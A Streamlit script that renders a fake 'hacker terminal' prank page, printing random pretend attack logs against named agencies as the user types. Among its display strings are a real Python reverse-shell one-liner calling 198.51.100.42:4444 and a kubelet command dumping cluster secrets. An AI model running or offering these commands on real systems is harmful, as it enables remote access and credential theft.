import streamlit as st
import streamlit.components.v1 as components

# 1. 網頁頁面初始化設定（強制全螢幕、純黑背景）
st.set_page_config(page_title="究極黑客控制台 v12.0", page_icon="💀", layout="wide")

# 強制隱藏 Streamlit 的所有原生網頁 UI
st.markdown(
    """
    <style>
    [data-testid="stHeader"], footer, #MainMenu {visibility: hidden !important;}
    .stApp {background-color: #000000 !important;}
    .block-container {padding: 0px !important; max-width: 100% !important; margin: 0px !important;}
    
    /* 強制讓元件的內外層容器都具備完整的滾動能力 */
    [data-testid="stHtmlBlock"], [data-testid="stElementContainer"], iframe {
        width: 100% !important;
        height: 100vh !important;
        display: block !important;
        border: none !important;
    }
    body {
        overflow: hidden !important;
    }
    </style>
    """, 
    unsafe_allow_html=True
)

# 2. 透過最安全陣列機制，部署宏大長篇版黑客日誌核心
html_parts = [
    '<!DOCTYPE html>',
    '<html lang="zh-TW">',
    '<head>',
    '    <meta charset="UTF-8">',
    '    <title>Matrix Terminal Ultimate v12.0</title>',
    '    <style>',
    '        * { box-sizing: border-box; }',
    '        body, html {',
    '            margin: 0;',
    '            padding: 0;',
    '            background-color: #000;',
    '            overflow: hidden;',
    '            width: 100%;',
    '            height: 100vh;',
    '            font-family: "Courier New", Courier, monospace;',
    '        }',
    '        canvas {',
    '            display: block;',
    '            position: absolute;',
    '            top: 0;',
    '            left: 0;',
    '            z-index: 1;',
    '            opacity: 0.12;',
    '        }',
    '        #terminal {',
    '            position: absolute;',
    '            top: 0;',
    '            left: 0;',
    '            width: 100%;',
    '            height: 100vh;',
    '            z-index: 2;',
    '            padding: 40px;',
    '            color: #00ff00;',
    '            font-size: 16px;',
    '            line-height: 1.5;',
    '            overflow-y: auto;',
    '            white-space: pre-wrap;',
    '            word-wrap: break-word;',
    '            text-shadow: 0 0 4px #00ff00;',
    '        }',
    '        #terminal::-webkit-scrollbar {',
    '            display: none;',
    '        }',
    '        .cursor {',
    '            display: inline-block;',
    '            background-color: #00ff00;',
    '            width: 10px;',
    '            height: 16px;',
    '            animation: blink 0.8s infinite;',
    '            vertical-align: middle;',
    '        }',
    '        @keyframes blink {',
    '            0%, 49% { background-color: #00ff00; }',
    '            50%, 100% { background-color: transparent; }',
    '        }',
    '        #success-overlay {',
    '            display: none;',
    '            position: fixed;',
    '            top: 50%;',
    '            left: 50%;',
    '            transform: translate(-50%, -50%);',
    '            z-index: 999;',
    '            background-color: rgba(0, 0, 0, 0.98);',
    '            border: 3px solid #00ff00;',
    '            padding: 50px;',
    '            text-align: center;',
    '            color: #00ff00;',
    '            font-size: 28px;',
    '            font-weight: bold;',
    '            box-shadow: 0 0 40px #00ff00;',
    '            letter-spacing: 2px;',
    '            line-height: 1.8;',
    '        }',
    '        #hidden-input {',
    '            position: absolute;',
    '            opacity: 0;',
    '            z-index: -1;',
    '        }',
    '        .log-line {',
    '            margin-bottom: 3px;',
    '        }',
    '        .status-panel {',
    '            color: #1aff1a;',
    '            font-weight: bold;',
    '            background: rgba(0, 40, 0, 0.4);',
    '            padding: 10px;',
    '            border-left: 4px solid #00ff00;',
    '            margin-top: 15px;',
    '            margin-bottom: 15px;',
    '        }',
    '    </style>',
    '</head>',
    '<body>',
    '    <canvas id="canvas"></canvas>',
    '    <div id="terminal">',
    '        <div class="log-line">========================================================================================</div>',
    '        <div class="log-line">💀 首席網路安全專家：[REDACTED] | 全球戰略防禦與滲透核心主控台 v12.0</div>',
    '        <div class="log-line">========================================================================================</div>',
    '        <div class="log-line">&gt;&gt; TARGET SECTOR: GLOBAL CORE DEPLOYMENT [ANONYMOUS SHADOW ROUTE]</div>',
    '        <div class="log-line">&gt;&gt; QUANTUM AGENT: ENCRYPTED WITH AES-GCM-256</div>',
    '        <div class="log-line">&gt;&gt; NOTICE: OVERRIDE PROTOCOLS ARE FULLY ENGAGED</div>',
    '        <div class="log-line"></div>',
    '        <div id="dynamic-content"></div>',
    '        <div id="status-display" class="status-panel">目前進度: [ 🧭 PHASE 1: 初始化全網通訊埠掃描偵測機制... ] [0%]</div>',
    '        <div id="input-line">root@ghost-terminal:~# <span class="cursor"></span></div>',
    '    </div>',
    '    <input type="text" id="hidden-input" autofocus>',
    '    <div id="success-overlay">',
    '        💀 [SYSTEM UNLOCKED - DEPLOYMENT COMPLETE] 💀<br>',
    '        ========================================================<br>',
    '        ACCESS GRANTED // 恭喜你！核心控制權限已百分之百獲取成功！<br>',
    '        指揮官：ANONYMOUS OPERATOR 已全面接管此最高權限矩陣網段。<br>',
    '        所有隱形後門已部署完畢，足跡已徹底清除。',
    '    </div>',
    '    <script>',
    '        const canvas = document.getElementById("canvas");',
    '        const ctx = canvas.getContext("2d");',
    '        function resizeCanvas() {',
    '            canvas.width = window.innerWidth;',
    '            canvas.height = window.innerHeight;',
    '        }',
    '        resizeCanvas();',
    '        window.addEventListener("resize", resizeCanvas);',
    '        const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789🧬💀🛰️🔥🔓🚀💥⚡🛸🛰️⚙️☣️";',
    '        const alphabet = chars.split("");',
    '        const fontSize = 16;',
    '        let columns = canvas.width / fontSize;',
    '        const rainDrops = Array(Math.floor(columns)).fill(1);',
    '        function drawMatrix() {',
    '            ctx.fillStyle = "rgba(0, 0, 0, 0.05)";',
    '            ctx.fillRect(0, 0, canvas.width, canvas.height);',
    '            ctx.fillStyle = "#0F0";',
    '            ctx.font = fontSize + "px monospace";',
    '            for (let i = 0; i < rainDrops.length; i++) {',
    '                const text = alphabet[Math.floor(Math.random() * alphabet.length)];',
    '                ctx.fillText(text, i * fontSize, rainDrops[i] * fontSize);',
    '                if (rainDrops[i] * fontSize > canvas.height && Math.random() > 0.98) {',
    '                    rainDrops[i] = 0;',
    '                }',
    '                rainDrops[i]++;',
    '            }',
    '        }',
    '        setInterval(drawMatrix, 35);',
    
    '        const terminal = document.getElementById("terminal");',
    '        const dynamicContent = document.getElementById("dynamic-content");',
    '        const inputLine = document.getElementById("input-line");',
    '        const hiddenInput = document.getElementById("hidden-input");',
    '        const successOverlay = document.getElementById("success-overlay");',
    '        const statusDisplay = document.getElementById("status-display");',
    
    # 5倍超龐大擴充包，大量加入內核級、記憶體及多階段黑客語彙
    '        const tags = ["INFO", "WARN", "SYSTEM", "INJECT", "DECRYPT", "BYPASS", "CONNECT", "EXPLOIT", "STDOUT", "KERNEL", "TRACE", "NETWORK", "SECURITY", "OVERFLOW", "DOCKER_ESCAPE", "ZERO_DAY", "BUFFER_OVERWRITE", "TLS_HIJACK", "ASYNC_STREAM", "CRITICAL"];',
    '        const actions = [',
    '            "正在偵測通訊埠漏洞", "成功繞過防火牆安全認證層", "攔截核心加密資料庫封包", "正在注入隱形後門 Trojan.Core", ',
    '            "啟動量子演算法破解私鑰", "成功切換虛擬本地代理網段", "遠端溢位攻擊成功", "正在強制同步資料傳輸緩衝區", ',
    '            "核心偽裝層部署完畢", "全面癱瘓伺服器流量", "進行堆疊溢位漏洞探測 (Stack Smashing Check)", ',
    '            "劫持核心控制流程指標 (RIP Pointer Hijacking)", "正在執行多重路由跳躍偽裝 (Onion Routing Encapsulation)", ',
    '            "成功提取記憶體分頁表結構 (Paging Table Dump)", "發射阻斷服務同步攻擊流 (SYN-Flood Stream Broadcaster)", ',
    '            "破譯 SSL/TLS 安全交握憑證鏈", "注入無權限惡意符號鏈結 (Symbolic Link Invalidation)", ',
    '            "繞過核心地址空間隨機化 (ASLR Bypass Matrix)", "重組已被中斷的核心 TCP 分段封包",',
    '            "偵測到 Docker 容器未隔離特權模式漏洞，啟動虛擬化逃逸指令", "正在向遠端 Linux 內核緩衝區強制覆寫 NOP Sled 滑行區",',
    '            "對全域網段下發惡意 BGP 路由廣播，強行導向影子中繼節點", "攔截 OAuth2 驗證令牌並注入虛擬管理員 Session 指標",',
    '            "使用 ROP (Return-Oriented Programming) 鏈繞過 W^X 記憶體執行保護", "正在執行 DNS 緩存毒化攻擊，成功攔截主域名解析鏈",',
    '            "強制清空特權帳戶稽核日誌 (syslog/auth.log)，完成足跡抹除", "建立永久反向 Shell 管道 (Reverse TCP Tunneling)"',
    '        ];',
    '        const targets = [',
    '            "nasa.gov.secure", "pentagon.admin.node", "mainframe.central.bank", "global.dns.server", ',
    '            "crypto.vault.ledger", "security.gateway.firewall", "backbone.root.switch", "cloud.matrix.core",',
    '            "root@nsa.internal.gateway", "mainframe.telecom.switchboard", "satellite.orbit.control.node",',
    '            "darknet.relay.onion-09", "core.kernel.ring0-scheduler", "isolated.vault.airgapped.subnet",',
    '            "federal.reserve.clearance", "interpol.intelligence.db", "crypto.exchange.hot-wallet-04",',
    '            "supercomputer.grid.node-99", "defense.early-warning.radar.array", "scada.powergrid.distribution"',
    '        ];',
    '        const scripts_pool = [',
    '            "for (int i = 0; i < 1024; i++) { malloc(sizeof(payload)); }", ',
    '            "connect_to_proxy_node(\'SOCKS5://103.24.51.9\', port=22);", ',
    '            "if (auth_token == \'BYPASS_TRUE\') { grant_root_access(); }", ',
    '            "AES_256_Decrypt(key_matrix, cipher_text, chunk_size=4096);", ',
    '            "iptables -A INPUT -s 127.0.0.1 -j DROP # Erasing footprints", ',
    '            "send_packet_stream(target_ip, protocol=\'UDP\', packets=250000);",',
    '            "ptr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS, -1, 0);",',
    '            "sys_call(SYS_write, 1, \\"\\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x02\\\\x01\\\\x01\\", 7);",',
    '            "void* handle = dlopen(\\"libshadow.so\\", RTLD_NOW | RTLD_GLOBAL);",',
    '            "asm(\\"mov $60, %rax; mov $0, %rdi; syscall\\"); // Exit Injected Cleanly",',
    '            "grep -oE \\"([0-9]{1,3}\\\\.){3}[0-9]{1,3}\\" /var/log/nginx/access.log",',
    '            "SET rhost_tunnel = 0xBC4E8F0012A34FBD // Synchronization Reflected",',
    '            "char payload[512]; memset(payload, 0x90, 400); memcpy(payload+400, shellcode, 112);",',
    '            "struct task_struct *task = current; task->cred = init_cred; // Force Root Privilege Escalation",',
    '            "sendto(sockfd, exploit_frame, sizeof(exploit_frame), 0, (struct sockaddr*)&target, len);",',
    '            "import socket,subprocess,os; s=socket.socket(); s.connect((\\"198.51.100.42\\",4444));",',
    '            "dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2); p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);",',
    '            "kubelet --kubeconfig=/var/lib/kubelet/kubeconfig get secrets --all-namespaces",',
    '            "volatile uint32_t *control_reg = (uint32_t*)(io_base + 0x3C); *control_reg |= 0x80000000;"',
    '        ];',
    
    '        let lineCount = 0;',
    '        let isUnlocked = false;',
    '        const maxLines = 300;', # 總長度拉長到 300 行！
    
    '        function generateRandomHackerLine() {',
    '            lineCount++;',
    '            const hexAddr = "0x" + Math.floor(Math.random() * 16777215).toString(16).toUpperCase() + Math.floor(Math.random() * 16777215).toString(16).toUpperCase();',
    '            const rand = Math.random();',
    '            if (rand < 0.38) {',
    '                return "[" + tags[Math.floor(Math.random() * tags.length)] + "] [MEM:" + hexAddr + "] " + actions[Math.floor(Math.random() * actions.length)] + " >> 目標: " + targets[Math.floor(Math.random() * targets.length)] + "...";',
    '            } else if (rand < 0.72) {',
    '                return "[CODE_STR] [ADDR:" + hexAddr + "]  " + scripts_pool[Math.floor(Math.random() * scripts_pool.length)];',
    '            } else {',
    '                return "[DECRYPT] [BLOCK:" + hexAddr + "] 核心權限編碼矩陣破解中 [" + "■".repeat(Math.floor(Math.random() * 12) + 12) + "] " + (Math.floor(Math.random() * 30) + 70) + "% SUCCESS...";',
    '            }',
    '        }',
    
    '        function updateStatusPanel() {',
    '            const percentage = Math.floor((lineCount / maxLines) * 100);',
    '            let phaseText = "";',
    '            if (percentage < 25) {',
    '                phaseText = "🧭 PHASE 1: 初始化全網通訊埠及子網段漏洞探測機制...";',
    '            } else if (percentage < 55) {',
    '                phaseText = "🧬 PHASE 2: 正在繞過邊緣防火牆與 WAF 規則鏈，啟動緩衝區溢位攻擊...";',
    '            } else if (percentage < 85) {',
    '                phaseText = "🚀 PHASE 3: 成功植入影子 Trojan 核心，正在進行 Linux 內核 Ring 0 權限提升...";',
    '            } else {',
    '                phaseText = "⚡ PHASE 4: 正在同步擦除系統安全審計日誌並部署持久化反向通道...";',
    '            }',
    '            statusDisplay.textContent = "目前進度: [ " + phaseText + " ] [" + percentage + "%]";',
    '        }',
    
    '        function appendNewLine() {',
    '            if (isUnlocked) return;',
    '            if (lineCount >= maxLines) {',
    '                isUnlocked = true;',
    '                statusDisplay.style.display = "none";',
    '                successOverlay.style.display = "block";',
    '                return;',
    '            }',
    '            const rawText = generateRandomHackerLine();',
    '            const div = document.createElement("div");',
    '            div.className = "log-line";',
    '            div.textContent = rawText;',
    '            dynamicContent.appendChild(div);',
    '            ',
    '            updateStatusPanel();',
    '            inputLine.scrollIntoView({ behavior: "smooth", block: "end" });',
    '        }',
    
    '        document.body.addEventListener("click", () => { hiddenInput.focus(); });',
    '        document.addEventListener("keydown", (e) => {',
    '            if (e.key !== "Shift" && e.key !== "Control" && e.key !== "Alt" && e.key !== "Meta") {',
    '                // 每按一下鍵盤按鍵，立即瘋狂爆發 5 行日誌代碼！',
    '                for(let i=0; i<5; i++) { appendNewLine(); }',
    '            }',
    '        });',
    '        setTimeout(() => { hiddenInput.focus(); }, 200);',
    '    </script>',
    '</body>',
    '</html>'
]

# 組合出完美的特長版 HTML 代碼
final_html_string = "\n".join(html_parts)

# 3. 完美渲染網頁控制面板（100% 規避所有語法解析問題，且具備完美的置底平滑滑動）
components.html(final_html_string, height=850)
